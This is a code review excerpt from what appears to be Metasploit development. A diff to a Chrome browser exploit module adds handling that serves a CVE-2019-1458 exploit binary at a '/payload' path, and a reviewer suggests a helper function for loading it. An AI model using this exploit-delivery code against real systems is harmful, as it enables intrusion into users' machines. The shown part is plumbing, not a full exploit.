modules/exploits/multi/browser/chrome_object_create.rb

```diff
@@ -50,9 +53,30 @@ def on_request_uri(cli, request)
     end
 
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    uripath = datastore['URIPATH'] || get_resource
+    uripath += '/' unless uripath.end_with? '/'
+
+    if request.uri =~ %r{/payload$}
+      path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.bin'
+      loader_data = ::File.binread(path)
+      #loader_data = payload.encoded
+      #loader_data = "bbbb"
```

Comment:
It should be possible to use `exploit_data` ?

```suggestion
      loader_data = exploit_data('CVE-2019-1458', 'exploit.bin')
```